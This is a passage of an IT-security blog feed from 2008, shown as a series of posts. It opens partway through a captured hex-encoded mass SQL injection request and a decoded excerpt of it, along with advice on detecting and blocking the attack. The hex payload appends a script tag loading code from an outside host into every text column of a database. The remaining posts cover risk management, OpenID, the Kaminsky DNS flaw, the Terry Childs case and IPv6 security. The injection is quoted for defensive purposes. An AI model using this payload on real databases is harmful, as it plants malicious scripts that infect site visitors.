0653D323331206F7220622E78747970653D31363 729204F50454E205461626C655F437572736F722 04645544348204E4558542046524F4D202054616 26C655F437572736F7220494E544F2040542C404 3205748494C4528404046455443485F535441545 5533D302920424547494E2065786563282775706 4617465205B272B40542B275D20736574205B272 B40432B275D3D5B272B40432B275D2B2727223E3 C2F7469746C653E3C736372697074207372633D2 2687474703A2F2F73646F2E313030306D672E636 E2F63737273732F772E6A73223E3C2F736372697 0743E3C212D2D272720776865726520272B40432 B27206E6F74206C696B6520272725223E3C2F746 9746C653E3C736372697074207372633D2268747 4703A2F2F73646F2E313030306D672E636E2F637 37273732F772E6A73223E3C2F7363726970743E3 C212D2D272727294645544348204E45585420465 24F4D20205461626C655F437572736F7220494E5 44F2040542C404320454E4420434C4F534520546 1626C655F437572736F72204445414C4C4F43415 445205461626C655F437572736F72%20AS%20CHA R(4000));EXEC(@S);HTTP/1.1</pre> </blockquote> <p style="clear: both;"> Which is a hex-encoded injection that, when translated, creates this SQL statement string (bad-guy address has been removed):<br> </p> <blockquote>DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update ['+@T+'] set ['+@C +']=['+@C+']+””&gt;</blockquote> <p style="clear: both;"> To search your web server logs for any offending lines, look for "DECLARE" anywhere in the query string. That's a dead give-away. You'll find attacks from various unsurprising countries including North Korea and China (or at least what's where I have seen them coming from).<br> <br> <b>How to solve?</b> <br> <br> First of all, if code like this can get through the web application and into the database, I'd recommend a complete review of the web app from a security standpoint. Basic best-practices for web applications assume that you will trust absolutely no input by default, and then examine all input to see if it is in a format and of a type that is appropriate. And it's very important to recognize that by "input" we mean any type of input vector - whether it be form fields, query string, URI, session data, etc. Input validation should be done on the server side, not just the client side (turning off javascript and manipulating data en-route to the server is pretty easy, after all).<br> <br> If you need a tactical approach to block this particular threat right now while you plan validation improvements, I'd recommend what many people are doing: Monitor all the input with your web server, and re-write the offending statements to something innocuous. That's a band-aid, but it can help in the short-term with this one particular need. In addition, you could use application-layer firewalls in from of your web server/farm to do the same thing. But neither of these approaches would be considered acceptable as a complete or permanent solution. You can certainly keep them in place after an app fix, as part of a layered security approach. But ultimately the site needs to be coded properly and not allow the bad input.<br> <br> HP recently released a tool that you can use to check for SQL injection vulnerabilities specifically <a href="http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2008/06/23/finding-sql-injection-with-scrawlr.aspx" target="_blank">called Scrawlr</a>. You can find it, and related information, <a href="http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2008/06/23/finding-sql-injection-with-scrawlr.aspx" target="_blank">here</a>.<br> </p> <blockquote><i>Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr is lightning fast and uses our intelligent engine technology to dynamically craft SQL Injection attacks on the fly. It can even provide proof positive results by displaying the type of backend database in use and a list of available table names. There is no denying you have SQL Injection when I can show you table names</i>!</blockquote> <p style="clear: both;"> If you are dealing with this attack or have related thoughts, please feel free to post in the comments with your experiences. </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,c50ba4fe-59fa-4bec-8aae-49a65a7a8a84.aspx IT Security Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=f37c508f-c1d2-4b9b-b414-5da4074a5b2f http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,f37c508f-c1d2-4b9b-b414-5da4074a5b2f.aspx http://www.greghughes.net/rant/CommentView,guid,f37c508f-c1d2-4b9b-b414-5da4074a5b2f.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=f37c508f-c1d2-4b9b-b414-5da4074a5b2f

Last week we published an interview that Richard and I did on RunAs Radio with my friend and former co-worker, Simon Goldstein. Simon's a real pro and is good at explaining complicated business relationships and processes.

We cover risk management for IT professionals: What is it, what do you need to know, and why does it matter? As with all of our weekly RunAs Radio shows, it's about 30 minutes long and we cover a lot of ground in that time.

RunAs Radio, Show 67 - Simon Goldstein on IT Risk Management (38 minutes)

Note: You can find all our podcast feeds in the table here, and you can also subscribe to get the show every week in iTunes by clicking here.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. IT Risk Management - an interview with my friend Simon Goldstein http://www.greghughes.net/rant/PermaLink,guid,f37c508f-c1d2-4b9b-b414-5da4074a5b2f.aspx http://www.greghughes.net/rant/ITRiskManagementAnInterviewWithMyFriendSimonGoldstein.aspx Mon, 28 Jul 2008 03:39:34 GMT <p style="clear: both; "> Last week <a href="http://runasradio.com/default.aspx?showNum=67" target="_blank">we published an interview</a> that Richard and I did on RunAs Radio with my friend and former co-worker, Simon Goldstein. Simon's a real pro and is good at explaining complicated business relationships and processes.<br /> <br /> We cover risk management for IT professionals: What is it, what do you need to know, and why does it matter? As with all of our weekly RunAs Radio shows, it's about 30 minutes long and we cover a lot of ground in that time.<br /> </p> <blockquote>RunAs Radio, Show 67 - <a href="http://runasradio.com/default.aspx?showNum=67" target="_blank">Simon Goldstein on IT Risk Management</a> (38 minutes)<br /> <br /> Note: You can find all our podcast feeds <a href="http://runasradio.com/" target="_blank">in the table here</a>, and you can also <a href="http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=253682066" title="" target="_blank">subscribe to get the show every week in iTunes by clicking here</a>.</blockquote> <p style="clear: both; "> </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,f37c508f-c1d2-4b9b-b414-5da4074a5b2f.aspx IT Security RunAs Radio Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=789f3cf1-4fce-426f-9acb-da1429fa3662 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,789f3cf1-4fce-426f-9acb-da1429fa3662.aspx http://www.greghughes.net/rant/CommentView,guid,789f3cf1-4fce-426f-9acb-da1429fa3662.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=789f3cf1-4fce-426f-9acb-da1429fa3662 Over on the Internet Evolution site I recently wrote an article discussing the fact that MySpace is becoming an OpenID provider. Of note is the fact that they will be provider-only, and not a relying party, at least initially. This is a trend we've seen with other big companies like Yahoo!, and many of us are not-too-patiently waiting for these companies to start trusting and relying upon other organizations, so the utopia of user-controlled Internet single-sign-on can become a reality.

That begs the question, "What will it take to achieve the level of trust and confidence needed to make it easy for these big provider companies to join the relying-party crowd?" I'm certain there are plenty of detailed conversations and that things are being hammered out and actively discussed behind the scenes at all these major companies, but I tend to think about these things out loud anyhow.

So, I hope you'll read my article and thoughts over on Internet Evolution and that you'll take advantage of the opportunity to comment there. I'd be interested to know what you think.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. What will it take to get OpenID adopters to be relying parties? http://www.greghughes.net/rant/PermaLink,guid,789f3cf1-4fce-426f-9acb-da1429fa3662.aspx http://www.greghughes.net/rant/WhatWillItTakeToGetOpenIDAdoptersToBeRelyingParties.aspx Sun, 27 Jul 2008 17:56:08 GMT Over <a href="http://www.internetevolution.com/author.asp?section_id=645&amp;doc_id=159806&amp;" title="" target="">on the Internet Evolution site I recently wrote an article</a> discussing the fact that MySpace is becoming an OpenID provider. Of note is the fact that they will be provider-only, and not a relying party, at least initially. This is a trend we've seen with other big companies like Yahoo!, and many of us are not-too-patiently waiting for these companies to start trusting and relying upon other organizations, so the utopia of user-controlled Internet single-sign-on can become a reality.<br> <br> That begs the question, "What will it take to achieve the level of trust and confidence needed to make it easy for these big provider companies to join the relying-party crowd?" I'm certain there are plenty of detailed conversations and that things are being hammered out and actively discussed behind the scenes at all these major companies, but I tend to think about these things out loud anyhow.<br> <br> So, I hope you'll <a href="http://www.internetevolution.com/author.asp?section_id=645&amp;doc_id=159806&amp;">read my article and thoughts over on Internet Evolution</a> and that you'll take advantage of the opportunity to comment there. I'd be interested to know what you think.<p style="clear: both;"> </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,789f3cf1-4fce-426f-9acb-da1429fa3662.aspx IT Security Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=3783a4c8-8fab-4d60-8a2a-4dae232d3e61 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,3783a4c8-8fab-4d60-8a2a-4dae232d3e61.aspx http://www.greghughes.net/rant/CommentView,guid,3783a4c8-8fab-4d60-8a2a-4dae232d3e61.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=3783a4c8-8fab-4d60-8a2a-4dae232d3e61

The DNS vulnerability discovered earlier this year by Dan Kaminsky, and recently patched by DNS software providers in an unprecedented cross-vendor cooperation, has graduated from vulnerability to exploit-in-the-wild.

According to Kaminsky, 52% of the DNS servers on the Internet are still vulnerable, better than the number of exploitable systems just a few weeks ago when the patches were released by all the vendors.

Kaminsky has written up a plain-language helper guide to explain the problem to non-technical (read: management and decision-making) people. There's also a Black Hat webcast with Kaminsky available where he details the vulnerability and discusses the fixes.

Read more at Ars Technica.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. DNS exploit now in the wild - 52% of DNS servers vulnerable today http://www.greghughes.net/rant/PermaLink,guid,3783a4c8-8fab-4d60-8a2a-4dae232d3e61.aspx http://www.greghughes.net/rant/DNSExploitNowInTheWild52OfDNSServersVulnerableToday.aspx Sat, 26 Jul 2008 19:38:05 GMT <p style="clear: both; "> The <a href="http://www.greghughes.net/rant/IsYourDNSServerSafeMajorSecurityHoleNeedsToBePatchedRightNow.aspx" target="_blank">DNS vulnerability</a> discovered earlier this year by Dan Kaminsky, and recently patched by DNS software providers in an unprecedented cross-vendor cooperation, has graduated from vulnerability to exploit-in-the-wild.<br /> <br /> According to <a href="http://www.doxpara.com/" target="_blank">Kaminsky</a>, 52% of the DNS servers on the Internet are still vulnerable, better than the number of exploitable systems just a few weeks ago when the patches were released by all the vendors.<br /> <br /> Kaminsky has written up <a href="http://www.doxpara.com/?p=1185" target="_blank">a plain-language helper guide</a> to explain the problem to non-technical (read: management and decision-making) people. There's also <a href="http://tinyurl.com/6hr3tw" title="" target="_blank">a Black Hat webcast with Kaminsky available</a> where he details the vulnerability and discusses the fixes.<br /> <br /> Read more <a href="http://arstechnica.com/news.ars/post/20080726-new-dns-exploit-now-in-the-wild-and-having-a-blast.html" target="_blank">at Ars Technica</a>. </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,3783a4c8-8fab-4d60-8a2a-4dae232d3e61.aspx IT Security Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=e8aa21cb-3742-42c2-8950-a3276865e8b9 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,e8aa21cb-3742-42c2-8950-a3276865e8b9.aspx http://www.greghughes.net/rant/CommentView,guid,e8aa21cb-3742-42c2-8950-a3276865e8b9.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=e8aa21cb-3742-42c2-8950-a3276865e8b9 6

In the case of Terry Childs, a network admin who gained notoriety recently for locking the City of San Francisco and his managers out of their own critical network, comic-book style progress has been made, with Childs' attorney inviting the mayor of SF to a secret meeting at the jail, where Childs handed over the passwords he'd previously refused to disclose.

Childs' lawyer, again in typical comic book fashion, has also come out saying that Childs' actions were essentially noble and that he was acting to protect the network he built from his management and peers, whom he characterized as being neglectful and without the proper knowledge to support the network. About what you'd expect from a defense lawyer in a public case, I suppose.

But Childs is in no way a hero. Even if what he says is completely true, he's (allegedly) committed a real crime. He does not own that network even if he helped build it, and regardless of whether the management in his department was capable of exercising its responsibilities, when Childs locked everyone out he crossed a clear line. If it was to make a point, he simply went overboard. The whole unfortunate case just smacks of ego and manic behavior.

But from arm's length the city doesn't exactly look like a helpless victim, either. Any professional management team that creates an environment where one person can control a critical and sensitive network in the manner exercised in this case has missed some of the most crucial and common-sense aspects of IT and security design. In fact, most of the time when cases of one-man-too-much-power crop up, we find that the IT staff is also responsible for security with little or no separation of duties, no checks and balances, and no controls to ensure one bad apple doesn't ruin the whole barrel.

Was Childs right? Absolutely not. Was the City wrong? I don't see how you can argue otherwise.

You'd likely be surprised how many real-world computer networks - big and small, important and less so - are run on the concept of "we just trust that one guy." It's what we call a "Beer Truck" risk problem: If I'm that guy you trust, what if I get hit by a beer truck and killed, or alternatively what if I drink everything on that beer truck and go nuts and wipe out the network? What then?

Systems should be set up to ensure no one person holds all the keys. Over the past few days I've read comments made about this story, in many cases by angry IT-types who say if you hire someone you have to give them access to everything and you have to trust them to do the right thing. Otherwise they cannot do their job, you're a terrible person and your network and systems are doomed. That premise is simply and blatantly false, and in fact following that method puts you in the same boat the City of San Francisco has just found itself in. Please, don't listen to the old-skool IT admin crowd, telling you to hand it all over to them because you obviously don't know what you're doing. Fire those guys and find some real help.

If you want a healthier view of the situation, check out articles written by smart, thoughtful people, like this one by Paul Doyle. Also, Paul Venezia wrote an in-depth article about what went wrong, with some detailed inside information.

To be clear, no one person should control all the systems. Control and authority are not the same thing. Checks and balances are important. The Air Force doesn't allow one person to perform all the steps needed to launch a ballistic missile, right? Apply the same principles to your IT systems.

Case in point: I was the chief security executive at a major online financial services company. I had administrative access to nothing. I couldn't even get in the data center without an escort and records being kept. I had no account access to critical or sensitive systems. And no one person there could make changes in a vacuum. IT workers didn't have access to security systems. Security workers didn't have administrative access to anything by default. And we operated effectively, smoothly, with full knowledge of what was happening on the network and systems. No one person had control. Authority, sure. But actual control of systems? No. To operate otherwise would have been negligent.

I often preach the value of formalizing security management and putting proper process, technology and organization in place to ensure a good, stable system that can effectively support business. One of the pillars of an effective security management system is hiring good people (probably not ones who have been convicted of aggravated robbery in the past, sorry) and separating duties in a way that protects everyone involved - employees included. Doing so is not punishment, it's just good common sense.

If nothing else, lets hope businesses and governments all over learn from this embarrassing public spectacle. There are standards out there (my background and experience is in ISO 27001, an international security management standard), the very purpose of which is to make sure things like this don't happen. It's high time to start using them.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. San Fransciso's network security woes - Everyone to blame? http://www.greghughes.net/rant/PermaLink,guid,e8aa21cb-3742-42c2-8950-a3276865e8b9.aspx http://www.greghughes.net/rant/SanFranscisosNetworkSecurityWoesEveryoneToBlame.aspx Wed, 23 Jul 2008 19:04:17 GMT <p style="clear: both;"> In <a href="http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2008/07/22/BAGF11T91U.DTL" target="_blank">the case of Terry Childs</a>, a network admin who gained notoriety recently for locking the City of San Francisco and his managers out of their own critical network, comic-book style progress has been made, with Childs' attorney inviting the mayor of SF to a secret meeting at the jail, where Childs handed over the passwords he'd previously refused to disclose. </p> <p style="clear: both;"> Childs' lawyer, again in typical comic book fashion, has also come out saying that Childs' actions were essentially noble and that he was acting to protect the network he built from his management and peers, whom he characterized as being neglectful and without the proper knowledge to support the network. About what you'd expect from a defense lawyer in a public case, I suppose.<br> <br> But Childs is in no way a hero. Even if what he says is completely true, he's (allegedly) committed a real crime. He does not own that network even if he helped build it, and regardless of whether the management in his department was capable of exercising its responsibilities, when Childs locked everyone out he crossed a clear line. If it was to make a point, he simply went overboard. The whole unfortunate case just smacks of ego and manic behavior.<br> <br> But from arm's length the city doesn't exactly look like a helpless victim, either. Any professional management team that creates an environment where one person can control a critical and sensitive network in the manner exercised in this case has missed some of the most crucial and common-sense aspects of IT and security design. In fact, most of the time when cases of one-man-too-much-power crop up, we find that the IT staff is also responsible for security with little or no separation of duties, no checks and balances, and no controls to ensure one bad apple doesn't ruin the whole barrel.<br> <br> Was Childs right? Absolutely not. Was the City wrong? I don't see how you can argue otherwise.<br> <br> You'd likely be surprised how many real-world computer networks - big and small, important and less so - are run on the concept of "we just trust that one guy." It's what we call a "Beer Truck" risk problem: If I'm that guy you trust, what if I get hit by a beer truck and killed, or alternatively what if I drink everything on that beer truck and go nuts and wipe out the network? What then?<br> <br> Systems should be set up to ensure no one person holds all the keys. Over the past few days I've read comments made about this story, in many cases by angry IT-types who say if you hire someone you have to give them access to everything and you have to trust them to do the right thing. Otherwise they cannot do their job, you're a terrible person and your network and systems are doomed. That premise is simply and blatantly false, and in fact following that method puts you in the same boat the City of San Francisco has just found itself in. Please, don't listen to the old-skool IT admin crowd, telling you to hand it all over to them because you obviously don't know what you're doing. Fire those guys and find some real help.<br> <br> If you want a healthier view of the situation, <a href="http://www.internetevolution.com/author.asp?section_id=690&amp;doc_id=159486&amp;" title="" target="_blank">check out articles written by smart, thoughtful people, like this one by Paul Doyle</a>. Also, <a href="http://www.infoworld.com/article/08/07/18/30FE-sf-network-lockout_1.html">Paul Venezia wrote an in-depth article about what went wrong</a>, with some detailed inside information.<br> <br> To be clear, no one person should control all the systems. Control and authority are not the same thing. Checks and balances are important. The Air Force doesn't allow one person to perform all the steps needed to launch a ballistic missile, right? Apply the same principles to your IT systems. </p> <p style="clear: both;"> Case in point: I was the chief security executive at a major online financial services company. I had administrative access to nothing. I couldn't even get in the data center without an escort and records being kept. I had no account access to critical or sensitive systems. And no one person there could make changes in a vacuum. IT workers didn't have access to security systems. Security workers didn't have administrative access to anything by default. And we operated effectively, smoothly, with full knowledge of what was happening on the network and systems. No one person had control. Authority, sure. But actual control of systems? No. To operate otherwise would have been negligent.<br> <br> I often preach the value of formalizing security management and putting proper process, technology and organization in place to ensure a good, stable system that can effectively support business. One of the pillars of an effective security management system is hiring good people (probably not ones who have been convicted of aggravated robbery in the past, sorry) and separating duties in a way that protects everyone involved - employees included. Doing so is not punishment, it's just good common sense.<br> <br> If nothing else, lets hope businesses and governments all over learn from this embarrassing public spectacle. There are standards out there (my background and experience is in ISO 27001, an international security management standard), the very purpose of which is to make sure things like this don't happen. It's high time to start using them. </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,e8aa21cb-3742-42c2-8950-a3276865e8b9.aspx IT Security Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=a7014cb5-0a6b-41a7-868e-b0a006af99af http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,a7014cb5-0a6b-41a7-868e-b0a006af99af.aspx http://www.greghughes.net/rant/CommentView,guid,a7014cb5-0a6b-41a7-868e-b0a006af99af.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=a7014cb5-0a6b-41a7-868e-b0a006af99af 1

DNS has a hole in it. Bad guys are working on exploits right now. Patches are available right now. Anyone responsible for a DNS server needs to exercise that responsibility. Right Now.

Dan Kaminsky found a security hole in DNS recently, the details of which he was keeping quiet so providers could fix and release patches and DNS server owners could get those patches deployed, in order to avoid security breaches on the Internet. His intent was to release the gory details in a couple weeks at the Black Hat conference.

But the other day word of the details inadvertently leaked out, and so now everyone responsible for a DNS system must - and I do mean must - drop what they're doing and make sure their systems are patched and safe. Failure to do so puts Internet users at risk of site fraud and hijacking.

DNS is a system that translates names you can remember (like www.greghughes.net) to especially non-memorable numerical addresses the Internet can route (such as 208.109.238.146). It's the Internet's phone book, so to speak.

The security hole allows malicious people to spoof a web site using the actual, legitimate domain name. In other words, bad guys could hijack a DNS server, and if it happens to be one your computer relys upon, you could type in a legitimate address like www.google.com or www.yourbank.com, but the web page would be a malicious one - a fake. The recently-released patches plug the hole and prevent this misuse (although it doesn't really change the underlying protocol).

Aaron Massey wrote a very good post describing the issue and it's various details. He also links to Halvar Flake, a talented reverse-engineering guy who thought the threat through and pretty much guessed it right on his blog. After Halvar's guess, another security blog that had specific knowledge of the threat details confirmed Flake's hypothesis. As a result, the threat was disclosed.

Luckily, the various creators of the DNS systems used all over the Internet released patches about two weeks ago. The real question is, have you patched your servers? This is a critical flaw - it needs to be patched immediately.

If you want to know whether the DNS server your computer relies upon is vulnerable or not, you can use the DNS Checker in the sidebar of Kaminsky's blog (as long as it remains there).



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. Is your DNS server safe? Major security hole needs to be patched right now http://www.greghughes.net/rant/PermaLink,guid,a7014cb5-0a6b-41a7-868e-b0a006af99af.aspx http://www.greghughes.net/rant/IsYourDNSServerSafeMajorSecurityHoleNeedsToBePatchedRightNow.aspx Wed, 23 Jul 2008 15:14:34 GMT <p style="clear: both;"> <b><i>DNS has a hole in it. Bad guys are working on exploits right now. Patches are available right now. Anyone responsible for a DNS server needs to exercise that responsibility. Right Now.</i></b> <br> <br> Dan Kaminsky <a href="http://www.doxpara.com/?p=1162" title="" target="_blank">found a security hole</a> in DNS recently, the details of which he was keeping quiet so providers could fix and release patches and DNS server owners could get those patches deployed, in order to avoid security breaches on the Internet. His intent was to release the gory details in a couple weeks at the Black Hat conference. </p> <p style="clear: both;"> But the other day word of the details inadvertently leaked out, and so now everyone responsible for a DNS system must - and I do mean <i>must</i> - drop what they're doing and make sure their systems are patched and safe. Failure to do so puts Internet users at risk of site fraud and hijacking. </p> <p style="clear: both;"> DNS is a system that translates names you can remember (like www.greghughes.net) to especially non-memorable numerical addresses the Internet can route (such as 208.109.238.146). It's the Internet's phone book, so to speak.<br> <br> The security hole allows malicious people to spoof a web site using the actual, legitimate domain name. In other words, bad guys could hijack a DNS server, and if it happens to be one your computer relys upon, you could type in a legitimate address like www.google.com or www.yourbank.com, but the web page would be a malicious one - a fake. The recently-released patches plug the hole and prevent this misuse (although it doesn't really change the underlying protocol).<br> <br> <a href="http://blaynesucks.com/2008/07/22/protocol-level-dns-flaw" target="_blank">Aaron Massey wrote a very good post</a> describing the issue and it's various details. He also <a href="http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html" target="_blank">links to Halvar Flake</a>, a talented reverse-engineering guy who thought the threat through and pretty much guessed it right on his blog. After Halvar's guess, another security blog that had specific knowledge of the threat details confirmed Flake's hypothesis. As a result, the threat was disclosed.<br> <br> Luckily, the various creators of the DNS systems used all over the Internet <a href="http://www.doxpara.com/?p=1162" target="_blank">released patches about two weeks ago</a>. The real question is, have you patched your servers? This is a critical flaw - it needs to be patched immediately.<br> <br> If you want to know whether the DNS server your computer relies upon is vulnerable or not, you can use <a href="http://www.doxpara.com/" target="_blank">the DNS Checker in the sidebar of Kaminsky's blog</a> (as long as it remains there). </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,a7014cb5-0a6b-41a7-868e-b0a006af99af.aspx IT Security Tech Things that Suck
http://www.greghughes.net/rant/Trackback.aspx?guid=fabc7d0b-bc28-4e6b-ae89-4bd450a29678 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,fabc7d0b-bc28-4e6b-ae89-4bd450a29678.aspx http://www.greghughes.net/rant/CommentView,guid,fabc7d0b-bc28-4e6b-ae89-4bd450a29678.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=fabc7d0b-bc28-4e6b-ae89-4bd450a29678

Chances are, if you're reading this around the time I am writing it, that your computer is not exposed to an IPv6 network. You're most likely on an IPv4 (classic) network. You can easily tell by trying the quick IPv6 test on this page.

Even if you're not on the new network stack yet, change is happening, and systems have to be adapted to make sure not only that the new network works (most - but not all - modern hardware and software "understands" IPv6), but also that when you do actually start to operate in an IPv6 world, that you are properly secured.

In an effective security world, you need to put protections in place soon enough, meaning before the threat appears. You have to protect proactively, without waiting for bad guys to exploit a network or system. In the case of the IPv4 to IPv6 transition, that means making sure things like intrusion prevention and detection systems, firewalls, and other software and devices that function in the network layer even know how to "talk" the IPv6 language.

A number of current security applications just don't know how, so now is the time for a call to action: IPv6-enable your technology right now, to prevent opportune threats in the future. Don't get caught with your pants down.

Kim Zetter wrote a good article on the subject the other day at WIred. "The Ghost in Your Machine: IPv6 Gateway to Hackers" outlines quite well the potential threat imposed by a lack of readiness from a security perspective. It's not all bleak and terrible news, but as the article makes clear, now is the time to fix the problem, before something bad happens.

Probably the most difficult aspect of understanding the potential issues introduced by an environment not ready for IPv6 is the lack of awareness among IT folk in general as to how IPv6 works, how it's used, and the services (quite good ones, I might add - take a look at how IPsec is baked right in, for example) integral to the protocol.

What's it take to get from here to there? Being prepared with real, solid and accurate information is probably the most important step. Not many of us are naturally wired to take action before something bad happens. As an IT guy, I can tell you this: In the real world, most IT people don't learn what they need to know until after they need to know it. A lazy learning methodology just won't work in this case.

For IT professionals, do not assume that just because you were able to pick up your IPv4 knowledge over a long weekend of studying and tinkering that you'll be able to do the same with IPv6 - That's just not the case. IPv6 is more complex and has a lot more parts to understand. If you haven't learned it by now, for shame. Some of you have a little time left. Get on the ball, and gain the deep understanding you need to do your job properly.

For application and hardware vendors that haven't yet dealt with the IPv6 change, you're running late. While many vendors of firewall software, switched, home routers, etc. have made the proper changes, there are also many that have not. Even worse, there are a variety of IPv4-to-IPv6 workarounds that can relatively easily be put in place by unknowing people (read: the IT guys mentioned above) that circumvent firewalls and other protections that are relied upon for good security. Bad design, convenient at the time, disaster waiting to happen. Prevent this.

If you're an individual computer user or owner, what is the status of your software vendors with regard to dealing with IPv6 network traffic? Are you running the latest firewall software, current router firmware? Do the latest versions protect you in an IPv6 world?

IPv6 is a great move, and in time it will dramatically change for the better how computers and devices interact. That is, if we don't manage to screw it all up in the process.

Now is the time. IPv6 is here, Go forth. Learn, analyze and secure.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. Call to action: What's your IPv6 threat profile look like? Are you protected? http://www.greghughes.net/rant/PermaLink,guid,fabc7d0b-bc28-4e6b-ae89-4bd450a29678.aspx http://www.greghughes.net/rant/CallToActionWhatsYourIPv6ThreatProfileLookLikeAreYouProtected.aspx Mon, 21 Jul 2008 06:07:02 GMT <p style="clear: both; clear: both; "> Chances are, if you're reading this around the time I am writing it, that your computer is not exposed to an IPv6 network. You're most likely on an IPv4 (classic) network. You can easily tell by trying the quick <a href="http://ipv4.whatismyv6.com/" target="_blank">IPv6 test on this page</a>. <br /> <br /> Even if you're not on the new network stack yet, change is happening, and systems have to be adapted to make sure not only that the new network works (most - but not all - modern hardware and software "understands" IPv6), but also that when you do actually start to operate in an IPv6 world, that you are properly secured. </p> <p style="clear: both; clear: both; "> In an effective security world, you need to put protections in place soon enough, meaning before the threat appears. You have to protect proactively, without waiting for bad guys to exploit a network or system. In the case of the IPv4 to IPv6 transition, that means making sure things like intrusion prevention and detection systems, firewalls, and other software and devices that function in the network layer even know how to "talk" the IPv6 language.<br /> <br /> A number of current security applications just don't know how, so now is the time for a call to action: IPv6-enable your technology right now, to prevent opportune threats in the future. Don't get caught with your pants down.<br /> <br /> Kim Zetter wrote <a href="http://blog.wired.com/27bstroke6/2008/07/the-ghost-in-yo.html" target="_blank">a good article</a> on the subject the other day at WIred. "<a href="http://blog.wired.com/27bstroke6/2008/07/the-ghost-in-yo.html" target="_blank">The Ghost in Your Machine: IPv6 Gateway to Hackers</a>" outlines quite well the potential threat imposed by a lack of readiness from a security perspective. It's not all bleak and terrible news, but as the article makes clear, now is the time to fix the problem, before something bad happens.<br /> <br /> Probably the most difficult aspect of understanding the potential issues introduced by an environment not ready for IPv6 is the lack of awareness among IT folk in general as to how IPv6 works, how it's used, and the services (quite good ones, I might add - take a look at how IPsec is baked right in, for example) integral to the protocol.<br /> <br /> What's it take to get from here to there? Being prepared with real, solid and accurate information is probably the most important step. Not many of us are naturally wired to take action before something bad happens. As an IT guy, I can tell you this: In the real world, most IT people don't learn what they need to know until <i>after</i> they need to know it. A lazy learning methodology just won't work in this case.<br /> <br /> For IT professionals, do not assume that just because you were able to pick up your IPv4 knowledge over a long weekend of studying and tinkering that you'll be able to do the same with IPv6 - That's just not the case. IPv6 is more complex and has a lot more parts to understand. If you haven't learned it by now, for shame. Some of you have a little time left. Get on the ball, and gain the deep understanding you need to do your job properly.<br /> <br /> For application and hardware vendors that haven't yet dealt with the IPv6 change, you're running late. While many vendors of firewall software, switched, home routers, etc. have made the proper changes, there are also many that have not. Even worse, there are a variety of IPv4-to-IPv6 workarounds that can relatively easily be put in place by unknowing people (read: the IT guys mentioned above) that circumvent firewalls and other protections that are relied upon for good security. Bad design, convenient at the time, disaster waiting to happen. Prevent this.<br /> <br /> If you're an individual computer user or owner, what is the status of your software vendors with regard to dealing with IPv6 network traffic? Are you running the latest firewall software, current router firmware? Do the latest versions protect you in an IPv6 world?<br /> <br /> IPv6 is a great move, and in time it will dramatically change for the better how computers and devices interact. That is, if we don't manage to screw it all up in the process.<br /> <br /> Now is the time. IPv6 is here, Go forth. Learn, analyze and secure. </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> 